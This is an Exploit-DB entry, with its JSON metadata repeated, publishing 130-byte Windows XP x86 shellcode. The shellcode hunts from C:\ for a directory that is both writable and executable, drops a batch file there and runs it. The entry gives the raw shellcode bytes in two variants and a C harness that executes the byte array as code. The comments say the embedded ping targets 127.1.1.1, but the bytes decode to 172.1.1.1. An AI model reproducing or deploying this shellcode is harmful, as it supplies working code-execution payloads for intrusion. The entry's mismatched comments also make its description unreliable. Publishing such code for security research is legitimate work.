ID EDB-ID:41467
Type exploitdb
Reporter Exploit-DB
Modified 2017-02-26T00:00:00
Description
Windows x86 - Executable Directory Search Shellcode (130 bytes). Shellcode exploit for Win_x86 platform
# Title: Windows x86 - Executable directory search Shellcode (130 bytes)
# Date: 26-02-2017
# Author: Krzysztof Przybylski
# Platform: Win_x86
# Tested on: WinXP SP1
# Shellcode Size: 130 bytes
/*
Description:
Searches for a directory that is both writable and executable.
starts from C:\
If dir found then write, execute (ping 127.1.1.1) and exit
If a directory is writable but not executable, continue searching.
Tested on WinXP SP1 (the two hard-coded call targets used below: 77e6fd35; 77e798fd)
i686-w64-mingw32-gcc shell.c -o golddgger.exe
Null-free version:
(gdb) disassemble
Dump of assembler code for function function:
=> 0x08048062 <+0>: pop ecx
0x08048063 <+1>: xor eax,eax
0x08048065 <+3>: mov BYTE PTR [ecx+0x64],al
0x08048068 <+6>: push eax
0x08048069 <+7>: push ecx
0x0804806a <+8>: mov eax,0x77e6fd35
0x0804806f <+13>: call eax
0x08048071 <+15>: xor eax,eax
0x08048073 <+17>: push eax
0x08048074 <+18>: mov eax,0x77e798fd
0x08048079 <+23>: call eax
NULL-free shellcode (132 bytes):
"\xeb\x19\x59\x31\xc0\x88\x41\x64"
"\x50\x51\xb8"
"\x35\xfd\xe6\x77" // exec
"\xff\xd0\x31\xc0\x50\xb8"
"\xfd\x98\xe7\x77" // exit
"\xff\xd0\xe8\xe2\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20"
"\x2f\x43\x20\x22\x28\x63\x64\x20"
"\x63\x3a\x5c" // C:\
"\x20\x26\x46\x4f\x52"
"\x20\x2f\x44\x20\x2f\x72\x20\x25"
"\x41\x20\x49\x4e\x20\x28\x2a\x29"
"\x20\x44\x4f\x20"
"\x65\x63\x68\x6f\x20"
"\x70\x69\x6e\x67\x20"
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 172.1.1.1 (bytes 31 37 32 decode to "172", not the 127.1.1.1 stated in the description)
"\x3e\x22\x25\x41\x5c\x7a\x2e\x62"
"\x61\x74\x22\x26\x28\x63\x61\x6c"
"\x6c\x20\x22\x25\x41\x5c\x7a\x2e"
"\x62\x61\x74\x22\x26\x26\x65\x78"
"\x69\x74\x29\x29\x22";
*/
// Version with a trailing NUL byte (130 bytes): the command string ends in \x00 here, whereas the NULL-free variant above writes the terminator at run time (mov BYTE PTR [ecx+0x64],al).
char code[] =
"\xeb\x16\x59\x31\xc0\x50\x51\xb8"
"\x35\xfd\xe6\x77" // exec
"\xff\xd0\x31\xc0\x50\xb8"
"\xfd\x98\xe7\x77" // exit
"\xff\xd0\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f"
"\x43\x20\x22\x28\x63\x64\x20"
"\x63\x3a\x5c" // C:\
"\x20\x26\x46\x4f\x52\x20\x2f\x44"
"\x20\x2f\x72\x20\x25\x41\x20\x49"
"\x4e\x20\x28\x2a\x29\x20\x44\x4f"
"\x20\x65\x63\x68\x6f\x20\x70\x69"
"\x6e\x67\x20"
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1
"\x3e\x22\x25\x41"
"\x5c\x7a\x2e\x62\x61\x74\x22\x26"
"\x28\x63\x61\x6c\x6c\x20\x22\x25"
"\x41\x5c\x7a\x2e\x62\x61\x74\x22"
"\x26\x26\x65\x78\x69\x74\x29\x29"
"\x22\x00";
/*
 * Entry point: treats the `code` array as machine code and transfers control
 * to it.  argc/argv are unused.  If the payload's final call does return,
 * main falls off its end, which C99 and later define as returning 0.
 */
int main(int argc, char **argv)
{
	(void)argc;
	(void)argv;

	/* Cast the data buffer to a function pointer.  This only works where the
	 * memory holding `code` is executable; the author reports testing on
	 * WinXP SP1 only.  The call's return value is discarded. */
	int (*entry)(void) = (int (*)(void)) code;
	entry();
}
{"id": "EDB-ID:41467", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Windows x86 - Executable Directory Search Shellcode (130 bytes)", "description": "Windows x86 - Executable Directory Search Shellcode (130 bytes). Shellcode exploit for Win_x86 platform", "published": "2017-02-26T00:00:00", "modified": "2017-02-26T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://www.exploit-db.com/exploits/41467/", "reporter": "Exploit-DB", "references": [], "cvelist": [], "lastseen": "2017-02-27T11:11:10", "viewCount": 20, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2017-02-27T11:11:10", "rev": 2}, "dependencies": {"references": [], "modified": "2017-02-27T11:11:10", "rev": 2}, "vulnersScore": -0.1}, "sourceHref": "https://www.exploit-db.com/download/41467/", "sourceData": "# Title: Windows x86 - Executable directory search Shellcode (130 bytes)\r\n# Date: 26-02-2017\r\n# Author: Krzysztof Przybylski\r\n# Platform: Win_x86\r\n# Tested on: WinXP SP1\r\n# Shellcode Size: 130 bytes\r\n\r\n/*\r\nDescription: \r\nwrite & exec dir searcher\r\nstarts from C:\\\r\nIf dir found then write, execute (ping 127.1.1.1) and exit\r\nIf Write/noexec dir found then continue\r\n\r\nTested on WinXP SP1 (77e6fd35;77e798fd)\r\ni686-w64-mingw32-gcc shell.c -o golddgger.exe\r\n\r\nNull-free version:\r\n\r\n(gdb) disassemble \r\nDump of assembler code for function function:\r\n=> 0x08048062 <+0>:\tpop ecx\r\n 0x08048063 <+1>:\txor eax,eax\r\n 0x08048065 <+3>:\tmov BYTE PTR [ecx+0x64],al\r\n 0x08048068 <+6>:\tpush eax\r\n 0x08048069 <+7>:\tpush ecx\r\n 0x0804806a <+8>:\tmov eax,0x77e6fd35\r\n 0x0804806f <+13>:\tcall eax\r\n 0x08048071 <+15>:\txor eax,eax\r\n 0x08048073 <+17>:\tpush eax\r\n 0x08048074 <+18>:\tmov eax,0x77e798fd\r\n 0x08048079 <+23>:\tcall eax\r\n\r\n\r\nNULL-free shellcode (132 bytes):\r\n\r\n\"\\xeb\\x19\\x59\\x31\\xc0\\x88\\x41\\x64\"\r\n\"\\x50\\x51\\xb8\"\r\n\"\\x35\\xfd\\xe6\\x77\" // 
exec\r\n\"\\xff\\xd0\\x31\\xc0\\x50\\xb8\"\r\n\"\\xfd\\x98\\xe7\\x77\" // exit\r\n\"\\xff\\xd0\\xe8\\xe2\\xff\\xff\\xff\"\r\n\"\\x63\\x6d\\x64\\x2e\\x65\\x78\\x65\\x20\"\r\n\"\\x2f\\x43\\x20\\x22\\x28\\x63\\x64\\x20\"\r\n\"\\x63\\x3a\\x5c\" // C:\\\r\n\"\\x20\\x26\\x46\\x4f\\x52\"\r\n\"\\x20\\x2f\\x44\\x20\\x2f\\x72\\x20\\x25\"\r\n\"\\x41\\x20\\x49\\x4e\\x20\\x28\\x2a\\x29\"\r\n\"\\x20\\x44\\x4f\\x20\"\r\n\"\\x65\\x63\\x68\\x6f\\x20\"\r\n\"\\x70\\x69\\x6e\\x67\\x20\" \r\n\"\\x31\\x37\\x32\\x2e\\x31\\x2e\\x31\\x2e\\x31\" // 127.1.1.1\r\n\"\\x3e\\x22\\x25\\x41\\x5c\\x7a\\x2e\\x62\"\r\n\"\\x61\\x74\\x22\\x26\\x28\\x63\\x61\\x6c\"\r\n\"\\x6c\\x20\\x22\\x25\\x41\\x5c\\x7a\\x2e\"\r\n\"\\x62\\x61\\x74\\x22\\x26\\x26\\x65\\x78\"\r\n\"\\x69\\x74\\x29\\x29\\x22\";\r\n\r\n*/\r\n// NULL version (130 bytes):\r\n\r\nchar code[] = \r\n\"\\xeb\\x16\\x59\\x31\\xc0\\x50\\x51\\xb8\"\r\n\"\\x35\\xfd\\xe6\\x77\" \t// exec\r\n\"\\xff\\xd0\\x31\\xc0\\x50\\xb8\"\r\n\"\\xfd\\x98\\xe7\\x77\" \t// exit\r\n\"\\xff\\xd0\\xe8\\xe5\\xff\\xff\\xff\\x63\"\r\n\"\\x6d\\x64\\x2e\\x65\\x78\\x65\\x20\\x2f\"\r\n\"\\x43\\x20\\x22\\x28\\x63\\x64\\x20\"\r\n\"\\x63\\x3a\\x5c\" \t// C:\\\r\n\"\\x20\\x26\\x46\\x4f\\x52\\x20\\x2f\\x44\"\r\n\"\\x20\\x2f\\x72\\x20\\x25\\x41\\x20\\x49\"\r\n\"\\x4e\\x20\\x28\\x2a\\x29\\x20\\x44\\x4f\"\r\n\"\\x20\\x65\\x63\\x68\\x6f\\x20\\x70\\x69\"\r\n\"\\x6e\\x67\\x20\"\r\n\"\\x31\\x37\\x32\\x2e\\x31\\x2e\\x31\\x2e\\x31\"\t// 127.1.1.1 \r\n\"\\x3e\\x22\\x25\\x41\"\r\n\"\\x5c\\x7a\\x2e\\x62\\x61\\x74\\x22\\x26\"\r\n\"\\x28\\x63\\x61\\x6c\\x6c\\x20\\x22\\x25\"\r\n\"\\x41\\x5c\\x7a\\x2e\\x62\\x61\\x74\\x22\"\r\n\"\\x26\\x26\\x65\\x78\\x69\\x74\\x29\\x29\"\r\n\"\\x22\\x00\";\r\n\r\nint main(int argc, char **argv)\r\n\r\n{\r\n int (*func)();\r\n func = (int (*)()) code;\r\n (int)(*func)();\r\n}\r\n", "osvdbidlist": []}
{}